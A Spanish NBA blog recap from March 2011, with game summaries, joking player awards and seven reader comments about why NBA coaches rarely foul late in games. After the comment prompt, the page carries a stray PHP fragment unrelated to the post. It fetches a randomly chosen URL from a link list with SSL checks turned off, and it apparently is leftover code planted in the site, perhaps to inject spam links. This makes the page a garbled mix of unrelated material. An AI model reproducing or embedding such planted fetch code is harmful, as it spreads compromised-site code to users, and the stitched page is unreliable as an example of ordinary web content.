La Crónica (26/03/2011)

27 de March de 2011 por Viva_Dirk

Jornada tranquila la de ayer para los gallos que saltaron a pista, porque visto lo visto no podemos considerar como tal a los Knicks que perdieron en Charlotte, y eso que fue un partido de ritmo alto, pero con Diaw&Jackson liderando y el resto aportando fue suficiente. Atlanta ganó a los Nets, ya lo hacian de 27 al descanso y después dejaron pasar los minutos, el duelo entre Al Horford y Brook Lopez es un reflejo del partido. En Detroit los Pistons ganaron a Indiana gracias a su pareja de guards que sumó 39 puntos y 12 asistencias, los Pacers por su parte estan empeñados en no entrar en play-offs.

Derrick Rose pasó por encima de los Bucks en la victoria de Chicago en Milwaukee a pesar del pésimo partido de Luol Deng, Boozer y Noah ganaron la batalla interior mientras Salmons y Delfino completaban una gran actuación. Los Mavs ganaron a Utah con un parcial de +19 en el último cuarto, Jason Terry fue el mejor de los suyos en un flojo partido de Nowitzki, los aficionados de los Jazzs empiezan a conocer las continuas molestias de Devin Harris. La noche se cerró con un duelo de rookies, Griffin vs Davis, el primero se fue hasta los 22 puntos, 16 rebotes y 5 asistencias por los 21 puntos, 11 rebotes, 3 asistencias y 8 de 11 en tiros del segundo, y fueron los Clippers los que ganaron a los Raptors.

PREMIOS

MVP: Rose, Rose y 17 veces Rose. Las asistencias que repartió ayer el máximo favorito al MVP. Y además anotó 30 puntos. LLega en plena forma a los Playoffs.

Rookie: La temporada de Ed Davis no puede pasar desapercibida. Tras recuperarse la lesión que le mantuvo apartado de las canchas al principio de la temporada ha cuajado buenas actuciones ganándose a pulso el respeto de sus compañeros. Anoche fueron 21 puntos y 11 rebotes.

Sorpresa: El mejor de los Nets en la derrota frente los Hawks fue el francés Johan Petro. 12 puntos, 8 rebotes y 3 asistencias en 22 minutos de juego.

Decepción: 6 puntos, 3 de 9 en tiro, 2 asistencias, 0 rebotes… No son los números de un escolta en un mal partido. Son los de Brook “Gladiator” Lopez. No coger un rebote en media hora de juego jugando de pívot debe ser hasta complicado.

Esfuerzo en vano: Otra decepción para Carmelo y los Knicks. 36 puntos que no sirvieron para evitar perder contra los Bobcats.

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. Len Bias dice:
    #1

    Le habéis quitado el premio de Rookie a Griffin por abusón no? Porque ganó a Davis y además hizo más números…

    En cuanto a Rose… impresionante. Los datos (30-17) ya son espectaculares, pero ves el partido y fue brutal

      Citar

  2. Sancho88 dice:
    #2

    Creo que las 17 asistencias de Rose son su tope como profesional. Yo me retracto de lo que dije un día, pues le acuse de que era un chupón egoísta y demás. Sus ejercicios de crossover, penetración y doblar el balón para Bogans, Deng, o Boozer a 4-5 metros me hicieron creer en sus dotes de mando, anoche. Me gusta mucho más así que cuando intenta remontar el solito tirando triples. Ayer los Bucks les pusieron en aprietos. Salmons y Delfino estaban enchufadísimos. De hecho, llegaron al final del tercer cuarto con más de 10 puntos de ventaja, y es cuando Bogans se clavó algunos triples y comenzó la verdadera exhibición de Rose.
    Salvando todas las distancias, tiene un movimiento muy parecido al de su majestad. Es cuando arranca desde fuera, penetra y hace la parada con los dos pies para elevarse con un buen timing y enchufarla. Lo hace en momentos claves y es muy eficaz. También su penetración con cambio de mano eligiendo dejar la bandeja de frente o a aro pasado tiene su parecido, porque a veces baja muchísimo el balón para esconderla y es imposible saber por donde va a tirar. Tiene un timing de salto acojonante.
    Se fundió a Jennings, en resumidas cuentas. Un Jennings que recibió el premio al jugador más solidario de la temporada en accipones sociales y todo esto. Supongo que la NBA se lo da con una porción considerable de sarcasmo, porque el tío es un chupón de campeonato. Solo 5 asistencias anoche. Quien diría que se ha criado en el basket europeo!!

      Citar

  3. Sancho88 dice:
    #3

    En la NBA te pagan si te dejas meter un clutch? porque madre mia, que descontrol. Ganan los Kings de 3 faltando 4,5 segundos y en vez de hacer falta se han dejado cascar un triple desde ocho metros.
    Protagonista del clutch: Louis Williams.
    Pardillo de la tarde: Paul Westphal y su pizarra mágica.
    Dirige: el maestro Leiva
    Es acojonante. Una vez escuché que al chacho, creo, le habían preguntado que como se defiende eso en Europa. Y el contestó, que muy facil. No se defiende, hay que hacer falta para tener la última posesion, o ir a un intercambio de tiros libres en el que es muy probable que te lleves el partido.

    …. Increible, ya digo. Seguramente palmaran mis Kings. Partidos asi se les han escapado unos 10 todo el año y no exagero

      Citar

  4. Denise dice:
    #4

    Esa jugada es algo que no entiendo de los coachs de la NBA. Ninguno hace falta para que el rival vaya a los tiros libres, casi todos, por no decir todos, se dejan que le tiren un triple.
    Hasta el Señor de los Anillos lo permite. Asi a bote pronto, recuerdo a los Lakers dejarse que los Thunder les tirasen dos triples para empatar (que no entraron) y hace poco tambien se dejaron tirar 2 triples (contra Phoenix en el partido de las 3 prorrogas si mal no recuerdo).
    Tampoco suelen hacer las europeas “faltas tácticas” para parar el contraataque y evitar la canasta facil. Es mejor para el espectaculo, pero no se entiende.

      Citar

  5. Txusma dice:
    #5

    #Len Bias. Ed Davis anotó 8 de sus 11 lanzamientos, mientras que Griffin hizo un 9 de 23, además de perder 2 balones.

    Yo recuerdo una faltas tácticas de los Blazers a Shaq acojonantes pero sí q es cierto q no son muy dados a ellas. Esto me lleva a preguntarme el encaje q tendría un Messina, por ejemplo, como entrenador de una franquicia NBA. Llevaría los partidos a 80 puntos si cree que es lo que hay hacer para ganar? Querrán eso los americanos? Anillos a cualquier precio?

      Citar

  6. Sancho88 dice:
    #6

    esta claro que no. a ellos le molan los highlights con algún triple sobre la bocina decidiendo algún partido por lo menos una o dos veces por semana. luego, a veces yo también comprendo que si la recibe Kobe y le haces falta, el tío tiene un botón imagnario que pulsa y le sale un triple desde 10-15 metros justo en el momento en el que le estas dando un leñazo que en Europa dejaría inhabilitado a cualquier paisano durante unos minutos, pero a él le sale un clutch de estos y te puede hacer 3+1. Ayer vi a Griffin me parece, en el partido empatadísimo contra Toronto. le hicieron falta dos tíos a la vez y consiguió tirar de espaldas en ese preciso momento, jeje. Por tanto, a veces van a ser tres tiros libres gratis, y supongo que esa es una de las razones por las que no hacen falta, pero joder, esta claro que si se piden 3-4 timeouts en el ultimo minuto, en uno aunque sea puedes decir… si ganamos de 3 y juegan ellos la ultima posesion… hay que hacer falta.
    pero bueno, debe ser algo cultural. todo al servicio del espectaculo. mini thrillers de 5 minutos, con revisiones oficiales por parte de los arbitros, los gritos de Stan Van Gundy en su decimocuarto timeout del partido (no se si os habeis fijado, pero es increible la de timeouts que tiene ese hombre) y los triples imposibles.
    Al final han ganado los Kings, pero vamos, por la cagada que hicieron merecian perder. No es normal…

      Citar

  7. MagicJohnson32 dice:
    #7

    Pues igual no visteis el Suns-Lakers del otro día pero Phoenix forzó una de las prórrogas con tres tiros libres de Frye precisamente porque Odom intentó hacerle falta antes del triple. Debéis tener en cuenta que la norma NBA es muy flexible con el tema de la continuación, y es extremadamente fácil sacar una falta de tiros.

    Además, Lou Williams llevaba un 0 de 9 en tiros, creo, así que a mí me pareció prudente dejarle tirar, jaja.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>